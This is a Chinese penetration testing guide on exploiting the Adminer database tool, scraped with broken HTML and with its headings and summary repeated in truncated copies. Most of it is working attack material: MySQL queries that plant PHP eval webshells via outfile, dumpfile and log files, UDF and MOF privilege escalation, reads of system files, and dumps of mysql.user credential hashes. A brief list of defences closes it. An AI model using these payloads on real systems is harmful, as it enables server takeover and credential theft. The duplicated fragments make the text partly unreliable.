Adminer漏洞利用与渗透测试指南<\/h1>

一、Adminer漏洞概述<\/h2>
Adminer是一个轻量级的数据库管理工具，当发现目标系统存在Adminer.php文件时，可以利用其特性进行渗透测试。<\/p>

关键版本信息<\/h3>

Adminer <= 4.6.2版本可利用"LOAD DATA LOCAL INFILE"特性读取文件<\/li>

通过界面可以获取Adminer版本信息<\/li> <\/ul>

二、恶意MySQL服务器搭建<\/h2>
利用Adminer连接恶意MySQL服务器读取文件：<\/p>

可用工具<\/h3>

MysqlHoneypot<\/strong> (Python2实现，可通过修改支持大文件读取)<\/li> <\/ol>
三、文件路径探测技术<\/h2>
操作系统判断<\/h3>

Windows<\/strong>:

c:\windows\win.ini<\/code><\/li>
c:\windows\system32\drivers\etc\hosts<\/code><\/li> <\/ul> <\/li>
Linux<\/strong>: \/etc\/passwd<\/code><\/li> \/etc\/hosts<\/code><\/li> <\/ul> <\/li> <\/ul> Windows路径探测<\/h3> 图标缓存数据库<\/strong>: Win7\/Vista: C:\Users\<username>\AppData\Local\IconCache.db<\/code><\/li> Win8\/10: C:\Users\<username>\AppData\Local\Microsoft\Windows\Explorer\<\/code>下的多个.db文件<\/li> 解密工具: FirstSound<\/a>, Windows-IconFixer<\/a><\/li> <\/ul> <\/li> <\/ol> Linux路径探测<\/h3> 定位数据库文件: \/var\/lib\/mlocate\/mlocate.db<\/code><\/li> \/var\/lib\/locate.db<\/code><\/li> <\/ul> <\/li> <\/ul> PHP框架路径探测<\/h3> ThinkPHP<\/strong>关键文件: index.php<\/code><\/li> build.php<\/code><\/li> thinkphp\/base.php<\/code><\/li> 配置文件路径: apps\/common.php<\/code><\/li> apps\/config.php<\/code><\/li> apps\/database.php<\/code><\/li> 或application\/<\/code>目录下的对应文件<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 四、Adminer后台利用技术<\/h2> 获取网站绝对路径方法<\/h3> 网页报错信息<\/li> 操作系统数据库文件(IconCache或mlocate.db)<\/li> MySQL安装目录猜测(select @@basedir<\/code>)<\/li> 日志文件(如ThinkPHP的runtime\/log\/202111\/30.log<\/code>)<\/li> 数据库中的配置信息<\/li> <\/ol> 写Webshell技术<\/h3> 1. outfile方法<\/h4> -- 检查权限 <\/span><\/span><\/span><\/span>show<\/span> global<\/span> variables like<\/span> '%secure%'<\/span>; <\/span><\/span> <\/span><\/span>-- 基本写入 <\/span><\/span><\/span><\/span>select<\/span> '<?php eval($_POST["x"]) ?>'<\/span> into<\/span> outfile 'C:\\path\\shell.php'<\/span>; <\/span><\/span> <\/span><\/span>-- 通过表写入 <\/span><\/span><\/span><\/span>DROP<\/span> TABLE<\/span> IF<\/span> EXISTS<\/span> temp; <\/span><\/span>CREATE<\/span> TABLE<\/span> temp (cmd text NOT<\/span> NULL<\/span>); <\/span><\/span>INSERT<\/span> INTO<\/span> temp (cmd) VALUES<\/span> ('<?php eval($_POST[x]) ?>'<\/span>); <\/span><\/span>SELECT<\/span> cmd FROM<\/span> temp INTO<\/span> outfile 'C:\\path\\shell.php'<\/span>; <\/span><\/span>DROP<\/span> TABLE<\/span> IF<\/span> EXISTS<\/span> temp; <\/span><\/span> <\/span><\/span>-- HEX编码写入 <\/span><\/span><\/span><\/span>select<\/span> 0<\/span>x3c3f706870206576616c28245f504f53545b2278225d29203f3e into<\/span> outfile 'C:\\path\\shell.php'<\/span>; <\/span><\/span><\/code><\/pre>注意<\/strong>: outfile会处理换行符(0a)和制表符(09)，建议使用0d(\r)作为换行符<\/p> 2. dumpfile方法<\/h4> -- 基本写入 <\/span><\/span><\/span><\/span>select<\/span> '<?php eval($_POST["x"]) ?>'<\/span> into<\/span> dumpfile 'C:\\path\\shell.php'<\/span>; <\/span><\/span> <\/span><\/span>-- 通过表写入 <\/span><\/span><\/span><\/span>DROP<\/span> TABLE<\/span> IF<\/span> EXISTS<\/span> temp; <\/span><\/span>CREATE<\/span> TABLE<\/span> temp (cmd text NOT<\/span> NULL<\/span>); <\/span><\/span>INSERT<\/span> INTO<\/span> temp (cmd) VALUES<\/span> ('<?php eval($_POST[x]) ?>'<\/span>); <\/span><\/span>SELECT<\/span> cmd FROM<\/span> temp INTO<\/span> dumpfile 'C:\\path\\shell.php'<\/span>; <\/span><\/span>DROP<\/span> TABLE<\/span> IF<\/span> EXISTS<\/span> temp; <\/span><\/span><\/code><\/pre>优势<\/strong>: dumpfile不会处理特殊字符，适合写入复杂shell<\/p> 3. general_log方法<\/h4> -- 检查配置 <\/span><\/span><\/span><\/span>show<\/span> global<\/span> variables like<\/span> '%general_log%'<\/span>; <\/span><\/span>select<\/span> @@<\/span>general_log_file; <\/span><\/span>select<\/span> @@<\/span>general_log; <\/span><\/span> <\/span><\/span>-- 开启日志并写入shell <\/span><\/span><\/span><\/span>set<\/span> global<\/span> general_log =<\/span> 'ON'<\/span>; <\/span><\/span>set<\/span> global<\/span> general_log_file =<\/span> 'C:\\path\\shell.php'<\/span>; <\/span><\/span>select<\/span> '<?php @eval($_POST[01282095])?>'<\/span>; <\/span><\/span><\/code><\/pre>4. slow_query_log方法<\/h4> -- 检查配置 <\/span><\/span><\/span><\/span>show<\/span> variables like<\/span> '%slow%'<\/span>; <\/span><\/span>select<\/span> @@<\/span>slow_query_log_file; <\/span><\/span>select<\/span> @@<\/span>slow_query_log; <\/span><\/span> <\/span><\/span>-- 开启慢日志并写入shell <\/span><\/span><\/span><\/span>set<\/span> GLOBAL<\/span> slow_query_log_file =<\/span> 'C:\\path\\shell.php'<\/span>; <\/span><\/span>set<\/span> GLOBAL<\/span> slow_query_log =<\/span> on<\/span>; <\/span><\/span>select<\/span> '<?php @eval($_POST["x"])?>'<\/span> from<\/span> mysql.db where<\/span> sleep(10<\/span>); <\/span><\/span><\/code><\/pre>五、高级利用技术<\/h2> 1. UDF提权<\/h3> -- 获取plugin目录 <\/span><\/span><\/span><\/span>select<\/span> @@<\/span>plugin_dir; <\/span><\/span>show<\/span> global<\/span> variables like<\/span> '%plugin%'<\/span>; <\/span><\/span> <\/span><\/span>-- 创建plugin目录(NTFS ADS流) <\/span><\/span><\/span><\/span>select<\/span> 0<\/span>x20 into<\/span> dumpfile 'C:\\mysql\\lib::$INDEX_ALLOCATION'<\/span>; <\/span><\/span>select<\/span> 0<\/span>x20 into<\/span> dumpfile 'C:\\mysql\\lib\\plugin::$INDEX_ALLOCATION'<\/span>; <\/span><\/span> <\/span><\/span>-- 检查系统架构 <\/span><\/span><\/span><\/span>select<\/span> @@<\/span>version_compile_os; <\/span><\/span>select<\/span> @@<\/span>version_compile_machine; <\/span><\/span> <\/span><\/span>-- 写入UDF DLL <\/span><\/span><\/span><\/span>select<\/span> 0<\/span>x... into<\/span> dumpfile "C:\\mysql\\lib\\plugin\\udf32.dll"<\/span>; <\/span><\/span> <\/span><\/span>-- 创建函数 <\/span><\/span><\/span><\/span>create<\/span> function<\/span> sys_exec returns<\/span> int soname 'udf32.dll'<\/span>; <\/span><\/span>create<\/span> function<\/span> sys_eval returns<\/span> string soname 'udf64.dll'<\/span>; <\/span><\/span> <\/span><\/span>-- 使用函数 <\/span><\/span><\/span><\/span>select<\/span> sys_exec('whoami'<\/span>); <\/span><\/span>select<\/span> sys_eval('whoami'<\/span>); <\/span><\/span> <\/span><\/span>-- 删除函数 <\/span><\/span><\/span><\/span>drop<\/span> function<\/span> sys_eval; <\/span><\/span><\/code><\/pre>2. MOF提权(仅限Server 2003\/XP)<\/h3> -- 写入恶意MOF文件 <\/span><\/span><\/span><\/span>select<\/span> 0<\/span>x... into<\/span> dumpfile 'C:\\Windows\\System32\\wbem\\MOF\\nullevt.mof'<\/span>; <\/span><\/span><\/code><\/pre>3. 其他提权方法<\/h3> LPK劫持<\/strong>: 写入恶意lpk.dll<\/li> 启动项<\/strong>: 写入用户启动目录<\/li> Crontab<\/strong>: Linux下写入计划任务(需root权限)<\/li> SSH Key<\/strong>: 写入授权密钥<\/li> <\/ul> 六、数据库信息收集<\/h2> 1. 搜索敏感字段<\/h3> -- 搜索特定数据库中的密码字段 <\/span><\/span><\/span><\/span>select<\/span> table_schema, table_name<\/span>, column_name<\/span> from<\/span> information_schema.COLUMNS <\/span><\/span>where<\/span> column_name<\/span> like<\/span> '%pass%'<\/span> and<\/span> table_schema =<\/span> 'target_db'<\/span>; <\/span><\/span> <\/span><\/span>-- 搜索所有数据库中的密码字段 <\/span><\/span><\/span><\/span>select<\/span> table_schema, table_name<\/span>, column_name<\/span> from<\/span> information_schema.COLUMNS <\/span><\/span>where<\/span> column_name<\/span> like<\/span> '%pass%'<\/span>; <\/span><\/span><\/code><\/pre>2. 获取MySQL凭据<\/h3> -- MySQL 5.6及以下 <\/span><\/span><\/span><\/span>select<\/span> host<\/span>, user<\/span>, password from<\/span> mysql.user<\/span>; <\/span><\/span> <\/span><\/span>-- MySQL 5.7及以上 <\/span><\/span><\/span><\/span>select<\/span> host<\/span>, user<\/span>, authentication_string from<\/span> mysql.user<\/span>; <\/span><\/span><\/code><\/pre>3. 读取系统文件<\/h3> -- 直接读取 <\/span><\/span><\/span><\/span>select<\/span> load_file('C:\\path\\file'<\/span>); <\/span><\/span> <\/span><\/span>-- HEX编码路径读取 <\/span><\/span><\/span><\/span>select<\/span> hex(load_file(0<\/span>x...)); <\/span><\/span><\/code><\/pre>七、防御建议<\/h2> 及时更新Adminer到最新版本<\/li> 限制MySQL的FILE权限<\/li> 设置secure_file_priv为特定目录<\/li> 禁用general_log和slow_query_log功能<\/li> 限制Adminer的访问IP<\/li> 定期检查系统异常文件<\/li> <\/ol> 八、总结<\/h2> 本指南详细介绍了从发现Adminer到最终获取系统权限的全过程，包括文件读取、路径探测、Webshell写入、提权技术等关键环节。渗透测试人员应合理使用这些技术，管理员则应加强相关防护措施。<\/p>

Adminer漏洞利用与渗透测试指南<\/h1>

一、Adminer漏洞概述<\/h2> Adminer是一个轻量级的数据库管理工具，当发现目标系统存在Adminer.php文件时，可以利用其特性进行渗透测试。<\/p>

二、恶意MySQL服务器搭建<\/h2> 利用Adminer连接恶意MySQL服务器读取文件：<\/p>

三、文件路径探测技术<\/h2>

四、Adminer后台利用技术<\/h2>

写Webshell技术<\/h3>

五、高级利用技术<\/h2>

六、数据库信息收集<\/h2>

八、总结<\/h2> 本指南详细介绍了从发现Adminer到最终获取系统权限的全过程，包括文件读取、路径探测、Webshell写入、提权技术等关键环节。渗透测试人员应合理使用这些技术，管理员则应加强相关防护措施。<\/p>

一、Adminer漏洞概述<\/h2>
Adminer是一个轻量级的数据库管理工具，当发现目标系统存在Adminer.php文件时，可以利用其特性进行渗透测试。<\/p>

二、恶意MySQL服务器搭建<\/h2>
利用Adminer连接恶意MySQL服务器读取文件：<\/p>

八、总结<\/h2>
本指南详细介绍了从发现Adminer到最终获取系统权限的全过程，包括文件读取、路径探测、Webshell写入、提权技术等关键环节。渗透测试人员应合理使用这些技术，管理员则应加强相关防护措施。<\/p>